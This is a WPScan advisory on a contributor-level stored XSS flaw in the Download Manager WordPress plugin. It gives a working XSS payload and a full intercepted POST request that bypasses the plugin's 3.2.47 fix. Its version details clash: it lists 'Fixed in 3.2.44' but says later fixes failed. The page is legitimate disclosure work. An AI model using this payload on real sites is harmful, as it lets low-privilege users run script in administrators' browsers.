WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Download Manager < 3.2.48 - Contributor+ Stored Cross-Site Scripting

Description

The plugin does not sanitise and escape the 'Insert URL' field, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks.

Note: The attempted fix made in 3.2.46 and 3.2.47 were found to be insufficient

Proof of Concept

As a contributor, create/edit a download and put the following payload in the 'Insert URL" field: https://example.com/?a="><svg/onload=alert(/XSS/)>

Then click on the + button next to the field to save the URL and click on the Submit for Review button

The XSS will be triggered when editing the Download (for example when an admin will review it)

In 3.2.47, the attack is still possible by adding a dummy URL, then intercepting the request made when saving the File Post and changing the file[files][] parameter to https://example.com/?a="><svg/onload=alert(/XSS/)>:


POST /wp-admin/post.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1887
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

_wpnonce=d1f3acca93&user_ID=1&action=editpost&originalaction=editpost&post_author=5&post_type=wpdmpro&original_post_status=publish&post_ID=6324&meta-box-order-nonce=0df29a4137&closedpostboxesnonce=ac72c29968&post_title=XSS+Contrib&samplepermalinknonce=db423b3cbb&content=&file%5Bfiles%5D%5B%5D=https%3a%2f%2fexample.com%2f%3fa%3d%22%3e%3csvg%2fonload%3dalert(%2fXSS%2f)%3e&wp-preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=06&jj=30&aa=2022&hh=22&mn=21&ss=28&hidden_mm=06&cur_mm=06&hidden_jj=30&cur_jj=30&hidden_aa=2022&cur_aa=2022&hidden_hh=22&cur_hh=22&hidden_mn=21&cur_mn=21&original_publish=Update&save=Update&tax_input%5Bwpdmcategory%5D%5B%5D=0&newwpdmcategory=New+Category+Name&newwpdmcategory_parent=-1&_ajax_nonce-add-wpdmcategory=67f0ab91c8&tax_input%5Bwpdmtag%5D=&newtag%5Bwpdmtag%5D=&_thumbnail_id=-1&excerpt=&metakeyselect=%23NONE%23&metakeyinput=&metavalue=&_ajax_nonce-add-meta=925d3f1564&advanced_view=1&comment_status=open&add_comment_nonce=d2ac60592b&_ajax_fetch_list_nonce=608563959a&post_name=xss-contrib&post_author_override=5&file%5Bversion%5D=&file%5Blink_label%5D=&file%5Bquota%5D=&file%5Bview_count%5D=1&file%5Bdownload_count%5D=&file%5Bpackage_size%5D=&file%5Baccess%5D%5B%5D=guest&file%5Bpage_template%5D=page-template-default.php&file%5Bterms_page%5D=&file%5Bterms_title%5D=&file%5Bterms_conditions%5D=&file%5Bterms_check_label%5D=&file%5Bpassword%5D=&file%5Bicon%5D=

Affects Plugins

download-manager
Fixed in version 3.2.44

References

CVE
CVE-2022-2101
URL
https://packetstormsecurity.com/files/167573/

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

Andrea Bocchetti

Verified

Yes

WPVDB ID
68d7e132-bb8c-4e83-b8aa-39067fbd638e

Timeline

Publicly Published

2022-06-22 (about 7 months ago)

Added

2022-06-27 (about 7 months ago)

Last Updated

2022-07-04 (about 7 months ago)

Our Other Services

WPScan WordPress Security Plugin